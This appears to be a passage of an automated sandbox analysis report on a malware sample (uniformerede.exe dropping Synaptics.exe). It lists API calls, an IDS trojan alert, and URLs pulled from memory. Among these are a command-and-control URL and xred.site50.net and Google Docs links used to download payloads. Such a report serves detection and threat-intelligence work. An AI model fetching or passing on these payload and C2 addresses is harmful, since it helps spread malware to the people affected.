Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	6_2_004099E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	6_2_00406018
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00409B1C FindFirstFileA,GetLastError,	6_2_00409B1C
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405D74
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040290B FindFirstFileW,	7_2_0040290B
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_0040699E FindFirstFileW,FindClose,	7_2_0040699E
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	9_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00409B1C FindFirstFileA,GetLastError,	9_2_00409B1C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	9_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	12_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	12_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00409B1C FindFirstFileA,GetLastError,	12_2_00409B1C

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49739 -> 69.42.215.252:80

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.58.149.33/ominz_QLUnxlrvVz46.bin

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 69.42.215.252 69.42.215.252

Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlX
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: RCXDA77.tmp.9.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.aadrm.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.aadrm.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.office.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.onedrive.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://augloop.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.entity.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://config.edge.skype.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cortana.ai/api
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://cr.office.com
Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000003.344709238.00000000054EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dev.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://devnull.onenote.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://directory.services.
Source: Synaptics.exe, 00000009.00000000.370263622.0000000005DCD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.goog
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/0
Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/dr
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: Synaptics.exe, 00000009.00000000.361451571.000000000868E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357737287.000000000757E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.359584810.0000000009BDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411248230.0000000008E1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352590518.0000000004F2D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.362549509.0000000009A9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371349676.00000000091DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352795877.000000000530D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.351426688.000000000476D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411631790.000000000945E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371160417.0000000008F5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.360559351.000000000743E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.410996975.000000000891E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.354553381.0000000005F0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.384503032.00000000096DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358342707.000000000818E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371594629.000000000959E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.373669676.00000000076BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408212313.000000000506D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.385722874.000000000A49E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408502135.000000000568D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo$
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-a
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Y6
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Y#
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI#N
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJx
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNZ
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNw
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
